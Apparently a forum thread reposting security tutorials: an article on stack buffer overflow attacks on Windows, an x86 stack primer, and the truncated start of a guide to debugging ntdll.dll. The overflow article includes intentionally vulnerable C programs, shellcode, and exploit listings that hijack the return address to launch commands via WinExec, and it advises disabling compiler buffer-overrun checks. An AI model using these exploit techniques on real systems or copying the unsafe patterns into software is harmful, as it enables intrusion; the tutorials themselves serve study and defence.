proxy (ncat, netcat + stunnel etc). A. Bechtsoudis Sursa: https://bechtsoudis.com/hacking/using-ssh-socks-proxies-with-msf-reverse-tcp-payloads/
  23. [h=1]Analysis of Buffer Overflow Attacks[/h][h=1]by Maciej Ogorkiewicz & Piotr Frej [Published on 8 Nov. 2002 / Last Updated on 23 Jan. 2013][/h] What causes the buffer overflow condition? Broadly speaking, buffer overflow occurs anytime the program writes more information into the buffer than the space it has allocated in the memory. This allows an attacker to overwrite data that controls the program execution path and hijack the control of the program to execute the attacker’s code instead the process code. For those who are curious to see how this works, we will now attempt to examine in more detail the mechanism of this attack and also to outline certain preventive measures. What causes the buffer overflow condition? Broadly speaking, buffer overflow occurs anytime the program writes more information into the buffer than the space it has allocated in the memory. This allows an attacker to overwrite data that controls the program execution path and hijack the control of the program to execute the attacker’s code instead the process code. For those who are curious to see how this works, we will now attempt to examine in more detail the mechanism of this attack and also to outline certain preventive measures. From experience we know that many have heard about these attacks, but few really understand the mechanics of them. Others have a vague idea or none at all of what an overflow buffer attack is. There also those who consider this problem to fall under a category of secret wisdom and skills available only to a narrow segment of specialists. However this is nothing except for a vulnerability problem brought about by careless programmers. Programs written in C language, where more focus is given to the programming efficiency and code length than to the security aspect, are most susceptible to this type of attack. In fact, in programming terms, C language is considered to be very flexible and powerful, but it seems that although this tool is an asset it may become a headache for many novice programmers. It is enough to mention a pointer-based call by direct memory reference mode or a text string approach. This latter implies a situation that even among library functions working on text strings, there are indeed those that cannot control the length of the real buffer thereby becoming susceptible to an overflow of the declared length. Before attempting any further analysis of the mechanism by which the attack progresses, let us develop a familiarity with some technical aspects regarding program execution and memory management functions. [h=2]Process Memory[/h] When a program is executed, its various compilation units are mapped in memory in a well-structured manner. Fig. 1 represents the memory layout. Fig. 1: Memory arrangement Legend: The text segment contains primarily the program code, i.e., a series of executable program instructions. The next segment is an area of memory containing both initialized and uninitialized global data. Its size is provided at compilation time. Going further into the memory structure toward higher addresses, we have a portion shared by the stack and heap that, in turn, are allocated at run time. The stack is used to store function call-by arguments, local variables and values of selected registers allowing it to retrieve the program state. The heap holds dynamic variables. To allocate memory, the heap uses the malloc function or the new operator. [h=2]What is the stack used for?[/h] The stack works according to a LIFO model (Last In First Out). Since the spaces within the stack are allocated for the lifetime of a function, only data that is active during this lifetime can reside there. Only this type of structure results from the essence of a structural approach to programming, where the code is split into many code sections called functions or procedures. When a program runs in memory, it sequentially calls each individual procedure, very often taking one from another, thereby producing a multi-level chain of calls. Upon completion of a procedure it is required for the program to continue execution by processing the instruction immediately following the CALL instruction. In addition, because the calling function has not been terminated, all its local variables, parameters and execution status require to be “frozen” to allow the remainder of the program to resume execution immediately after the call. The implementation of such a stack will guarantee that the behavior described here is exactly the same. [h=2]Function calls[/h] The program works by sequentially executing CPU instructions. For this purpose the CPU has the Extended Instruction Counter (EIP register) to maintain the sequence order. It controls the execution of the program, indicating the address of the next instruction to be executed. For example, running a jump or calling a function causes the said register to be appropriately modified. Suppose that the EIP calls itself at the address of its own code section and proceeds with execution. What will happen then? When a procedure is called, the return address for function call, which the program needs to resume execution, is put into the stack. Looking at it from the attacker’s point of view, this is a situation of key importance. If the attacker somehow managed to overwrite the return address stored on the stack, upon termination of the procedure, it would be loaded into the EIP register, potentially allowing any overflow code to be executed instead of the process code resulting from the normal behavior of the program. We may see how the stack behaves after the code of Listing 1 has been executed. Listing1 void f(int a, int { char buf[10]; // <-- the stack is watched here } void main() { f(1, 2); } After the function f() is entered, the stack looks like the illustration in Figure 2. Fig. 2 Behavior of the stack during execution of a code from Listing 1 Legend: Firstly, the function arguments are pushed backwards in the stack (in accordance with the C language rules), followed by the return address. From now on, the function f() takes the return address to exploit it. f() pushes the current EBP content (EBP will be discussed further below) and then allocates a portion of the stack to its local variables. Two things are worth noticing. Firstly, the stack grows downwards in memory as it gets bigger. It is important to remember, because a statement like this: sub esp, 08h That causes the stack to grow, may seem confusing. In fact, the bigger the ESP, the smaller the stack size and vice versa. An apparent paradox. Secondly, whole 32-bit words are pushed onto the stack. Hence, a 10-character array occupies really three full words, i.e. 12 bytes. [h=2]How does the stack operate?[/h] There are two CPU registers that are of “vital” importance for the functioning of the stack which hold information that is necessary when calling data residing in the memory. Their names are ESP and EBP. The ESP (Stack Pointer) holds the top stack address. ESP is modifiable and can be modified either directly or indirectly. Directly – since direct operations are executable here, for example, add esp, 08h. This causes shrinking of the stack by 8 bytes (2 words). Indirectly – by adding/removing data elements to/from the stack with each successive PUSH or POP stack operation. The EBP register is a basic (static) register that points to the stack bottom. More precisely it contains the address of the stack bottom as an offset relative to the executed procedure. Each time a new procedure is called, the old value of EBP is the first to be pushed onto the stack and then the new value of ESP is moved to EBP. This new value of ESP held by EBP becomes the reference base to local variables that are needed to retrieve the stack section allocated for function call {1}. Since ESP points to the top of the stack, it gets changed frequently during the execution of a program, and having it as an offset reference register is very cumbersome. That is why EBP is employed in this role. [h=2]The threat[/h] How to recognize where an attack may occur? We just know that the return address is stored on the stack. Also, data is handled in the stack. Later we will learn what happens to the return address if we consider a combination, under certain circumstances, of both facts. With this in mind, let us try with this simple application example using Listing 2. Listing 2 #include char *code = "AAAABBBBCCCCDDD"; //including the character '\0' size = 16 bytes void main() { char buf[8]; strcpy(buf, code); } When executed, the above application returns an access violation {2}. Why? Because an attempt was made to fit a 16-character string into an 8–byte space (it is fairly possible since no checking of limits is carried out). Thus, the allocated memory space has been exceeded and the data at the stack bottom is overwritten. Let us look once again at Figure 2. Such critical data as both the frame address and the return address get overwritten (!). Therefore, upon returning from the function, a modified return address has been pushed into EIP, thereby allowing the program to proceed with the address pointed to by this value, thus creating the stack execution error. So, corrupting the return address on the stack is not only feasible, but also trivial if “enhanced” by programming errors. Poor programming practices and bugged software provide a huge opportunity for a potential attacker to execute malicious code designed by him. [h=2]Stack overrun[/h] We must now sort all the information. As we already know, the program uses the EIP register to control execution. We also know that upon calling a function, the address of the instruction immediately following the call instruction is pushed onto the stack and then popped from there and moved to EIP when a return is performed. We may ascertain that the saved EIP can be modified when being pushed onto the stack, by overwriting the buffer in a controlled manner. Thus, an attacker has all the information to point his own code and get it executed, creating a thread in the victim process. Roughly, the algorithm to effectively overrun the buffer is as follows: 1. Discovering a code, which is vulnerable to a buffer overflow. 2. Determining the number of bytes to be long enough to overwrite the return address. 3. Calculating the address to point the alternate code. 4. Writing the code to be executed. 5. Linking everything together and testing . The following Listing 3 is an example of a victim’s code. Listing 3 – The victim’s code #include #define BUF_LEN 40 void main(int argc, char **argv) { char buf[bUF_LEN]; if (argv > 1) { printf(„\buffer length: %d\nparameter length: %d”, BUF_LEN, strlen(argv[1]) ); strcpy(buf, argv[1]); } } This sample code has all the characteristics to indicate a potential buffer overflow vulnerability: a local buffer and an unsafe function that writes to memory, the value of the first instruction line parameter with no bounds checking employed. Putting to use our newfound knowledge, let us accomplish a sample hacker’s task. As we ascertained earlier, guessing a code section potentially vulnerable to buffer overflow seems simple. The use of a source code (if available) may be helpful otherwise we can just look for something critical in the program to overwrite it. The first approach will focus on searching for string-based function like strcpy(), strcat() or gets(). Their common feature is that they do not use unbounded copy operations, i.e. they copy as many as possible until a NULL byte is found (code 0). If, in addition, these functions operate on a local buffer and there is the possibility to redirect the process execution flow to anywhere we want, we will be successful in accomplishing an attack. Another approach would be trial and error, by relying on stuffing an inconsistently large batch of data inside any available space. Consider now the following example: victim.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA If the program returns an access violation error, we may simply move on to step 2. The problem now, is to construct a large string with overflow potential to effectively overwrite the return address. This step is also very easy. Remembering that only whole words can be pushed onto the stack, we simply need to construct the following string: AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUU............. If successful, in terms of potential buffer overflow, this string will cause the program to fail with the well-known error message: The instruction at „0x4b4b4b4b” referenced memory at „0x4b4b4b4b”. The memory could not be „read” The only conclusion to be drawn is that since the value 0x4b is the letter capital “K” in ASCII code, the return address has been overwritten with „KKKK”. Therefore, we can proceed to Step 3.Finding the buffer beginning address in memory (and the injected shellcode) will not be easy. Several methods can be used to make this “guessing” more efficient, one of which we will discuss now, while the others will be explained later. In the meanwhile we need to get the necessary address by simply tracing the code. After starting the debugger and loading the victim program, we will attempt to proceed. The initial concern is to get through a series of system function calls that are irrelevant from this task point of view. A good method is to trace the stack at runtime until the input string characters appear successively. Perhaps two or more approaches will be required to find a code similar to that provided below: :00401045 8A08 mov cl, byte ptr [eax] :00401047 880C02 mov byte ptr [edx+eax], cl :0040104A 40 inc eax :0040104B 84C9 test cl, cl :0040104D 75F6 jne 00401045 This is the strcpy function we are looking for. On entry to the function, the memory location pointed by EAX is read in order to move (next line) its value into memory location, pointed by the sum of the registers EAX and EDX. By reading the content of these registers during the first iteration we can determine that the buffer is located at 0x0012fec0. Writing a shellcode is an art itself. Since operating systems use different system function calls, an individual approach is needed, depending on the OS environment under which the code must run and the goal it is being aimed at. In the simplest case, nothing needs to be done, since just overwriting the return address causes the program to deviate from its expected behavior and fail. In fact, due to the nature of buffer overflow flaws associated with the possibility that the attacker can execute arbitrary code, it is possible to develop a range of different activities constrained only by available space (although this problem can also be circumvented) and access privileges. In most cases, buffer overflow is a way for an attacker to gain “super user” privileges on the system or to use a vulnerable system to launch a Denial of Service attack. Let us try, for example, to create a shellcode allowing commands (interpreter cmd.exe in WinNT/2000). This can be attained by using standard API functions: WinExec or CreateProcess. When WinExec is called, the process will look like this: WinExec(command, state) In terms of the activities that are necessary from our point of view, the following steps must be carried out: - pushing the command to run onto the stack. It will be „cmd /c calc”. - pushing the second parameter of WinExec onto the stack. We assume it to be zero in this script. - pushing the address of the command „cmd /c calc”. - calling WinExec. There are many ways to accomplish this task and the snippet below is only one of possible tricks: sub esp, 28h ; 3 bytes jmp call ; 2 bytes par: call WinExec ; 5 bytes push eax ; 1 byte call ExitProcess ; 5 bytes calling: xor eax, eax ; 2 bytes push eax ; 1 byte call par ; 5 bytes .string cmd /c calc|| ; 13 bytes Some comments on this: sub esp, 28h This instruction adds some room to the stack. Since the procedure containing an overflow buffer had been completed, consequently, the stack space allocated for local variables is now declared as unused due to the change in ESP. This has the effect that any function call which is given from the code level is likely to overwrite our arduously constructed code inserted in the buffer. To have a function callee-save, all we need is to restore the stack pointer to what it was before “garbage”, that is to its original value (40 bytes) thereby assuring that our data will not be overwritten. jmp call The next instruction jumps to the location where the WinExec function arguments are pushed onto the stack. Some attention must be paid to this. Firstly, a NULL value is required to be “elaborated” and placed onto the stack. Such a function argument cannot be taken directly from the code otherwise it will be interpreted as null terminating the string that has only been partially copied. In the next step, we need a way of pointing the address of the command to run and we will make this in a somewhat ad hoc manner. As we may remember, each time a function is called, the address following the call instruction is placed onto the stack. Our successful (hopefully) exploit first overwrites the saved return address with the address of the function we wish to call. Notice that the address for the string may appear somewhere in the memory. Subsequently, WinExec followed by ExitProcess will be run. As we already know, CALL represents an offset that moves the stack pointer up to the address of the function following the callee. And now we need to compute this offset. Fig. 3 below shows a structure of a shellcode to accomplish this task. Fig. 3 A sample shellcode Legend: As can be seen, our example does not consider our reference point, the EBP, that needs to be pushed onto the stack. This is due to an assumption that the victim program is a VC++ 7 compiled code with its default settings that skip the said operation. The remaining job around this problem is to have the code pieces put together and test the whole. The above shellcode, incorporated in a C program and being more suitable for the CPU is presented in Listing 4. Listing 4 – Exploit of a program victim.exe #include #include #include #include char *victim = "victim.exe"; char *code = "\x90\x90\x90\x83\xec\x28\xeb\x0b\xe8\xe2\xa8\xd6\x77\x50\xe8\xc1\x90\xd6\x77\x33\xc0\x50\xe8\xed\xff\xff\xff"; char *oper = "cmd /c calc||"; char *rets = "\xc0\xfe\x12"; char par[42]; void main() { strncat(par, code, 28); strncat(par, oper, 14); strncat(par, rets, 4); char *buf; buf = (char*)malloc( strlen(victim) + strlen(par) + 4); if (!buf) { printf("Error malloc"); return; } wsprintf(buf, "%s \"%s\"", victim, par); printf("Calling: %s", buf); WinExec(buf, 0); } Ooops, it works! The only requisite is that the current directory has a compiled file victim.exe from Listing 3. If all goes as expected, we will see a window with a well-known System Calculator. [h=2]Stock-based and non-stack based exploits[/h] In the previous example we presented an own code that is executable once the control over the program has been taken over. However, such an approach may not be applicable, when a „victim” is able to check that no illegal code on the stack is executed, otherwise the program will be stopped. Increasingly, so called non-stack based exploits are being used. The idea is to directly call the system function by overwriting (nothing new!) the return address using, for example, WinExec. The only remaining problem is to push the parameters used by the function onto the stack in a useable state. So, the exploit structure will be like in Figure 4. Fig. 4 A non-stack based exploit Legend: A non-stack-based exploit requires no instruction in the buffer but only the calling parameters of the function WinExec. Because a command terminated with a NULL character cannot be handled, we will use a character ‘|’. It is used to link multiple commands in a single command line. This way each successive command will be executed only if the execution of a previous command has failed. The above step is indispensable for terminating the command to run without having executed the padding. Next to the padding which is only used to fill the buffer, we will place the return address (ret) to overwrite the current address with that of WinExec. Furthermore, pushing a dummy return address onto it ® must ensure a suitable stack size. Since WinExec function accepts any DWORD values for a mode of display, it is possible to let it use whatever is currently on the stack. Thus, only one of two parameters remains to terminate the string. In order to test this approach, it is necessary to have the victim’s program. It will be very similar to the previous one but with a buffer which is considerably larger (why? We will explain later). This program is called victim2.exe and is presented as Listing 5. Listing 5 – A victim of a non-stack based exploit attack #include #define BUF_LEN 1024 void main(int argc, char **argv) { char buf[bUF_LEN]; if (argv > 1) { printf(„\nBuffer length: %d\nParameter length: %d”, BUF_LEN, strlen(argv[1]) ); strcpy(buf, argv[1]); } } To exploit this program we need a piece given in Listing 6. Listing 6 – Exploit of the program victim2.exe #include char* code = "victim2.exe \"cmd /c calc||AAAAA...AAAAA\xaf\xa7\xe9\x77\x90\x90\x90\x90\xe8\xfa\x12\""; void main() { WinExec( code, 0 ); } For simplicity’s sake, a portion of „A” characters from inside the string has been deleted. The sum of all characters in our program should be 1011. When the WinExec function returns, the program makes a jump to the dummy saved return address and will consequently quit working. It will then return the function call error but by that time the command should already be performing its purpose. Given this buffer size, one may ask why it is so large whereas the “malicious” code has become relatively smaller? Notice that with this procedure, we overwrite the return address upon termination of the task. This implies that the stack top restores the original size thus leaving a free space for its local variables. This, in turn, causes the space for our code (a local buffer, in fact) to become a room for a sequence of procedures. The latter can use the allocated space in an arbitrary manner, most likely by overwriting the saved data. This means that there is no way to move the stack pointer manually, as we cannot execute any own code from there. For example, the function WinExec that is called just at the beginning of the process, occupies 84 bytes of the stack and calls subsequent functions that also place their data onto the stack. We need to have such a large buffer to prevent our data from destruction. Figure 5 illustrates this methodology. Fig. 5 A sample non-stack based exploit: stack usage Legend: This is just one of possible solutions that has many alternatives to consider. First of all, it is easy to compile because it is not necessary to create an own shellcode. It is also immune to protections that use monitoring libraries for capturing illegal codes on the stack. [h=2]System function calling[/h] Notice, that all previously discussed system function callings employ a jump command to point to a pre-determined fixed address in memory. This determines the static behavior of the code which implies that we agree to have our code non transferable across various Windows operating environments. Why? Our intention is to suggest a problem associated with the fact that various Windows OSes use different user and kernel addresses. Therefore, the kernel base address differs and so do the system function addresses. For details, see Table 1. Table 1. Kernel addresses vs. OS environment [TABLE] [TR] [TD=width: 185] Windows Platform [/TD] [TD=width: 159] Kernel Base Address [/TD] [/TR] [TR] [TD=width: 185] Win95 [/TD] [TD=width: 159] 0xBFF70000 [/TD] [/TR] [TR] [TD=width: 185] Win98 [/TD] [TD=width: 159] 0xBFF70000 [/TD] [/TR] [TR] [TD=width: 185] WinME [/TD] [TD=width: 159] 0xBFF60000 [/TD] [/TR] [TR] [TD=width: 185] WinNT (Service Pack 4 and 5) [/TD] [TD=width: 159] 0x77F00000 [/TD] [/TR] [TR] [TD=width: 185] Win2000 [/TD] [TD=width: 159] 0x77F00000 [/TD] [/TR] [/TABLE] To prove it, simply run our example under operating an system other than Windows NT/2000/XP. What remedy would be appropriate? The key is to dynamically fetch function addresses, at the cost of a considerable increase in the code length. It turns out that it is sufficient to find where two useful system functions are located, namely GetProcAddress and LoadLibraryA, and use them to get any other function address returned. For more details, see references, particularly the Kungfoo project developed by Harmony [6]. [h=2]Other ways of defining the beginning of the buffer[/h] All previously mentioned examples used Debugger to establish the beginning of the buffer. The problem lies in the fact that we wanted to establish this address very precisely. Generally, it is not a necessary requirement. If, assuming that the beginning of an alternate code is placed somewhere in the middle of the buffer and not at the buffer beginning whereas the space after the code is filled with many identical jump addresses, the return address will surely be overwritten as required. On the other hand, if we fill the buffer with a series of 0x90s till the code beginning, our chance to guess the saved return address will grow considerably. So, the buffer will be filled as illustrated in Figure 6. Fig. 6 Using NOPs during an overflow attack Legend: The 0x90 code corresponds to a NOP slide that does literally nothing. If we point at any NOP, the program will slide it and consequently it will go to the shellcode beginning. This is the trick to avoid a cumbersome search for the precise address of the beginning of the buffer. [h=2]Where does the risk lie?[/h] Poor programming practices and software bugs are undoubtedly a risk factor. Typically, programs that use text string functions with their lack of automatic detection of NULL pointers. The standard C/C++ libraries are filled with a handful of such dangerous functions. There are: strcpy(), strcat(), sprintf(), gets(), scanf(). If their target string is a fixed size buffer, a buffer overflow can occur when reading input from the user into such a buffer. Another commonly encountered method is using a loop to copy single characters from either the user or a file. If the loop exit condition contains the occurrence of a character, this means that the situation will be the same as above. [h=2]Preventing buffer overflow attacks[/h] The most straightforward and effective solution to the buffer overflow problem is to employ secure coding. On the market there are several commercial or free solutions available which effectively stop most buffer overflow attacks. The two approaches here are commonly employed: - library-based defenses that use re-implemented unsafe functions and ensure that these functions can never exceed the buffer size. An example is the Libsafe project. - library-based defenses that detect any attempt to run illegitimate code on the stack. If the stack smashing attack has been attempted, the program responds by emitting an alert. This is a solution implemented in the SecureStack developed by SecureWave. Another prevention technique is to use compiler-based runtime boundaries, checking what recently became available and hopefully with time, the buffer overflow problem will end up being a major headache for system administrators. While no security measure is perfect, avoiding programming errors is always the best solution. [h=2]Summary[/h] Of course, there are plenty of interesting buffer overflow issues which have not been discussed. Our intention was to demonstrate a concept and bring forth certain problems. We hope that this paper will be a contribution to the improvement of the software development process quality through better understanding of the threat, and hence, providing better security to all of us. [h=2]References[/h] The links listed below form a small part of a huge number of references available on the World Wide Web. [1] Aleph One, Smashing The Stack For Fun and Profit, Phrack Magazine nr 49, http://www.phrack.org/show.php?p=49&a=14 [2] P. Fayolle, V. Glaume, A Buffer Overflow Study, Attacks & Defenses, http://www.enseirb.fr/~glaume/indexen.html [3] I. Simon, A Comparative Analysis of Methods of Defense against Buffer Overflow Attacks, http://www.mcs.csuhayward.edu/~simon/security/boflo.html [4] Bulba and Kil3r, Bypassing StackGuard and Stackshield, Phrack Magazine 56 No 5, http://phrack.infonexus.com/search.phtml?view&article=p56-5 [5] many interesting papers on Buffer Overflow and not only: http://www.nextgenss.com/research.html#papers [6] http://harmony.haxors.com/kungfoo [7] Avaya Business Communications Research & Development - Avaya Labs [8] www.securewave.com Endnotes: {1} In practice, certain code-optimizing compilers may operate without pushing EBP on the stack. The Visual C++ 7 Compiler uses it as a default option. To deactivate it, set: Project Properties | C/C++ | Optimization | Omit Frame Pointer for NO. {2} Microsoft has introduced a buffer overrun security tool in its Visual C++ 7. If you are intending to use the above examples to run in this environment, ensure that this option is not selected before compilation: Project Properties | C/C++ | Code Generation | Buffer Security Check should have the value NO. Sursa: Analysis of Buffer Overflow Attacks :: Windows OS Security :: Articles & Tutorials :: WindowSecurity.com
  24. [h=3]A required step to understand buffer overflow[/h] This is not a buffer overflow exploit, but a required background that will help to understand how CPU & memory "collaborate" each other to execute a program. I have read many articles about 'buffer overflow'. Most of them starting from a specific point by 'stowing' the basic knowledge one must have to deeply understand what is going on (behind the scenes). I wrote this article to cover (I hope) this gap. If at the end of this article you feel more comfortable with concepts like CALL, RETN and how a function is executed using the memory (buffer, stack, etc) then I will consider this article as a successful one... First, I would like to point out that everything we say, is about the processor xx86 family. In addition, most memory addresses are expressed in a decimal notation (for the shake of clarity, for beginners) instead of hexadecimal that actually represented by real world software systems. Requirements in order to read this article: 1. A basic understanding of assembly language. 2. A basic understanding of C language. Every process starts in a computer memory (RAM – Random Access Memory) in three basic segments: -Code Segment -Data Segment (the well known BSS) -Stack Segment CODE SEGMENT ------------ In this memory segment, "live" all instructions of our program. Nobody... (nobody? well ok, almost nobody) can write to this memory segment i.e. is a read only segment. For example All assembly instructions (in C code here) are located in code segment: /* Set the 1st diagonal items to 1 otherwise 0 */ for (i = 0; i < 100; i++) for (j = 0; j < 100; j++) if (i<>j) a[i][j] = 0 else a[i][j] = 1; PS: The remarks /*...*/ are not included... in the data segment. The compiler does not produce code for the remarks. DATA SEGMENT ------------ All initialized or un-initialized global variable are stored in this non-read only segment. For example: int i; int j = 0; int a[100][100]; STACK SEGMENT ------------- All function variables, return addresses and function addresses are stored in this non-readonly memory. This segment is actually a stack data structure (for those that have attended a basic information technology course). This, actually means, that we put variables in a stack in memory. The last putted (or pushed) variable is in the top on stack i.e. the first available. The well known LIFO (Last In First Out) data structure. The processor register ESP (Extended Stack Pointer) is used to keep the address of the first current available element of the stack. In the stack: we can put (PUSH) and get (POP) values. There are two important “secrets” here: [1] PUSH and POP instructions are done in 4-byte-units because of the 32bit architecture of xx86 processors family. [2] Stack grows downward, that is, if SP=256, just after a “PUSH 34” instruction, SP will become 252 and the value of EAX will be placed on address 252. For example: STACK adrs memory ---- ------------------ 256 | xy | 252 | | 248 | | 244 | | ... ................. (ESP=256) Instruction > PUSH EAX ; remark: suppose EAX = 34 STACK 256 | xy | 252 | 34 | 248 | | 244 | | ... ................. (ESP=252) Instruction > POP EAX ; remark: Get the value from the stack into EAX register STACK 256 | xy | 252 | 34 | 248 | | 244 | | ... ................. (ESP=256) Instruction > PUSH 15 ; remark: suppose EAX = 15 Instruction > PUSH 16 ; remark: suppose EBX = 16 STACK 256 | xy | 252 | 15 | 248 | 16 | 244 | | ... ................. (ESP=248) What is behind a function-call ------------------------------- Before we explain what is behind, we must say a few words about the EIP (Extended Instruction Pointer or simple 'Instruction pointer'). This register keeps the code segment address of the instruction that will be executed by the CPU. Every time CPU executes an instruction stores into EIP the address of the instruction that follows the currently executed. But, how does CPU find the address of the next instruction? Well... we have two cases here... 1. The address is immediately after the instruction currently executed. 2. There is a 'JMP' (jump, i.e. a function call) so the instruction that needs to be executed next is in an address which is not next to the current. In case 1 the address is calculated by simply add the Length of the currently executed instruction to the current EIP value. Example: Suppose we have the following 2 instruction to the addresses 100, 101 100 push EDX 101 mov ESP 0 Suppose that at the starting point of our little program we have: EIP = 100 CPU executes the instruction at address 100. CPU checks the instruction: Is it a JUMP? No, so calculate its size. CPU knows that the push instruction is 1 byte long. So,... the new value of EIP = EIP + size(push EDX) => EIP = 100 + 1 => EIP = 101 So,.... CPU executes the instruction at address 101, and so forth... In case 2, we have a jump... things are a bit more different. Actually, just before we JMP to another address (i.e. call a function), we save the address of the next instruction in a temporary register, say in EDX; and before returning from the function we write the address in EDX to EIP back again. CALL and RETN assembly instructions are used ... by the CPU to calculate the above addresses: The CALL is used to do 2 things: 1. To "remember" the next instruction that will be executed after function returns (by pushing its address to the stack) and 2. To write into the EIP the address of the calling function i.e. to perform the function call. The RETN instruction is called at the end of the function: It pops (gets) the "return address" that CALL pushes into the stack to continue the execution after the end of the function. The Base pointer (EBP) ---------------------- Each function in any program (even the main() function in C) has its own stack frame. A stack frame is a logical group of consecutive variables in the stack that keeps variables and addresses for every function that is currently executed. Every address in the stack’s frame is a relative address. That means, we address the locations of data in our stack in relative to some criterion. And this criterion is EBP, which is the acronym for Extended Base Pointer. EBP has the stack pointer of the caller function. We PUSH the old ESP to the stack, and utilize another register,named EBP to relatively reference local variables in the callee function. I hope the use of the base pointer will be more clear in the following example. A REAL EXAMPLE C PROGRAM: Consider the following C program: void function1(int , int , int ); void main() { function1 (1, 2, 3); } void function1 (int a, int b, int c) { char z[4]; } I compile/link the above program and I use the olly debugger to check the assembly code created. Bypassing the operating systems instructions (which is the 90% of the assembly code) the rest is the code that corresponds to our little program: 0040123C /. 55 PUSH EBP 0040123D |. 8BEC MOV EBP,ESP 0040123F |. 6A 03 PUSH 3 ; /Arg3 = 00000003 00401241 |. 6A 02 PUSH 2 ; |Arg2 = 00000002 00401243 |. 6A 01 PUSH 1 ; |Arg1 = 00000001 00401245 |. E8 05000000 CALL bo1.0040124F ; \bo1.0040124F 0040124A |. 83C4 0C ADD ESP,0C 0040124D |. 5D POP EBP 0040124E \. C3 RETN 0040124F /$ 55 PUSH EBP 00401250 |. 8BEC MOV EBP,ESP 00401252 |. 51 PUSH ECX 00401253 |. 59 POP ECX 00401254 |. 5D POP EBP 00401255 \. C3 RETN ANALYSIS: --------- The addresses from 0040123C to 0040124E is the main() function. The addresses from 0040124F to 00401255 is the function1() function. 0040123C /. 55 PUSH EBP Backs up the old stack pointer. It pushes it onto the stack. 0040123D |. 8BEC MOV EBP,ESP Copy the old stack pointer to the ebp register From then on, in the function, we'll reference function's local variables with EBP. These two instructions are called the "Procedure Prologue". The stack has the EBP value: [ebp] STACK 256 | [ebp] | ... ................. (ESP=256) 0040123F |. 6A 03 PUSH 3 ; /Arg3 = 00000003 00401241 |. 6A 02 PUSH 2 ; |Arg2 = 00000002 00401243 |. 6A 01 PUSH 1 ; |Arg1 = 00000001 Here we put the arguments into the stack The stack is: STACK 256 | [ebp] | 252 | 3 | 248 | 2 | 244 | 1 | ... ................. (ESP=244) 00401245 |. E8 05000000 CALL bo1.0040124F ; \bo1.0040124F call the function at addresss 0040124F. bo1 is the name of my executable. The stack becomes: STACK 256 | [ebp] | 252 | 3 | 248 | 2 | 244 | 1 | 240 | 0040124A | <- the return address when the function1 ends. ... ................. (ESP=240) Let’s follow the execution, so go to address 0040124F (the function1): 0040124F /$ 55 PUSH EBP 00401250 |. 8BEC MOV EBP,ESP Hmm... this is the "Procedure Prologue" again (remember this must be executed in every function). It set ups its own stack frame. The EBP register is currently pointing at a location in main's stack frame. This value must be preserved. So, EBP is pushed onto the stack. Then the contents of ESP is transferred to EBP. This allows the arguments to be referenced as an offset from EBP and frees up the stack register ESP to do other things. The stack now, is: STACK 256 | [ebp] | 252 | 3 | 248 | 2 | 244 | 1 | 240 | 0040124A | <- the return address when the function1 ends. 236 | <main’s EBP> | <- Note that ESP=EBP indicates this address. ... ................. (ESP=236) 00401253 |. 59 POP ECX 00401254 |. 5D POP EBP After two pops the actual stack becomes: STACK 256 | [ebp] | 252 | 3 | 248 | 2 | 244 | 1 | ... ................. (ESP=244) 00401255 \. C3 RETN The function ends and returns to the 0040124A (remember our definition of the RET instruction). 0040124A |. 83C4 0C ADD ESP,0C After the function RETurned, we add 12 or 0C in hex (since we pushed 3 args onto the stack, each allocating 4 bytes (integers)) into Stack Pointer. Increasing the ESP we actually decreasing the stack (remember that we fill stack downwards from high to low memory addresses i.e. ESP = 244 + 12 = 256). STACK 256 | [ebp] | ... ................. (ESP=256) Thus, the ESP has the value that has at the first step of the programs execution before the function call. I hope that you get a basic understanding of the use of Stack and Stack Pointer. In another article I will describe how nasty things can happened here. Hint: How about overwriting the stack item (at address 240 in our example above) or how about overwriting the value of the Instruction Pointer (EIP)... I suggest you to try my little program or better create your own and test, check, review, test, check, review, test, check, review!! Happy Programming Guys!! References: [1] BUFFER OVERFLOWS DEMYSTIFIED by murat@enderunix.org [2] C Function Call Conventions and the Stack (UMBC CMSC 313, Computer Organization & Assembly Language, Spring 2002, Section 0101) [3] The Assembly Language Book for IBM PC by Peter Norton (ISBN 960-209-028-6) [4] Analysis of Buffer Overflow Attacks from Analysis of Buffer Overflow Attacks :: Windows OS Security :: Articles & Tutorials :: WindowSecurity.com [5] 8088 8086 Programming and Applications for IBM PC/XT & Compatibles by Nikos Nasoufis Posted by Andreas Venieris at 7:49 PM Sursa: 0x191 Unauthorized: A required step to understand buffer overflow
  25. [h=3]Debugging the Native Windows API[/h] We are going to play a little game. We will search inside the Native Windows Application Programming Interface (API) for functions that used internally by the Windows 7 operating system. The use of such functions is not suggested by Microsoft. We are not only going to uncover such functions, but also we will use them and we will examine their results. The Native API is behind the Base API that Microsoft suggests to use for compatibility and portability reasons. The Native API is the last layer (in user mode) that performs direct calls to the windows kernel mode and more specific to the NTOSKRNL.EXE that is the core windows kernel. I must say that, in my opinion, the method of checking the API of windows is not the easiest thing. I could say that it is more difficult than this in Linux while windows source is not available. Its a closed source. How then is possible to study a specific API function? Only disassembly code can be extracted by processes that are not belong to core kernel. In case that we want to debug kernel, we will need special programs (a windows kernel debugger for example), but this is beyond the scope of this article. We will see from a user-mode point of view the procedures and functions (even undocumented) inside the Native API, aka ntdll.dll. A question that one might ask, is: But why we do this? Hmm... there are more than one reason: 1. It is a very good elementary lesson for the wannabe operating systems reverser's. 2. We will learn how to administer our operating system's basic internal actions. 3. We will see live the operation of the (somehow) cryptic native windows API. What knowledge is required to read this article? Well, not deep. 1. Elementary knowledge of some reversing techniques, for example how to use Olly debugger. 2. Little (yes little!) knowledge of assembly. We will meet inevitability a lot of assembly code in our trip but I am not willing to make this article an assembly listing with explanations! We will see how to achieve our goals without the need to be an assembly programmer. Lets start! The native API is implemented inside the ntdll.dll that is located in c:\windows\system32. For the shake of safety lets copy this dll to a work directory say d:\work2. Every test is presented here is performed in a box with Windows 7 Ultimate 64bit. What I am going to do now is to extract every single function that this DLL contains and to (randomly...?) choose one to examine. In order to extract all the exported functions of ntdll.dll I will use the program dumpbin that is come with Visual Studio 2008. I enter: D:\work2> dumpbin ntdll.dll /exports > exports.txt and I create (through redirection) the file exports.txt that contains all the functions that ntdll.dll exports. When I open (using ultraedit) I will see the following: Image 1: Exported functions of ntdll.dll Looking inside this file I found this: ordinal hint RVA name 933 398 0003859A RtlGetVersion Hmm... there is a function named RtlGetVersion that is located at RVA 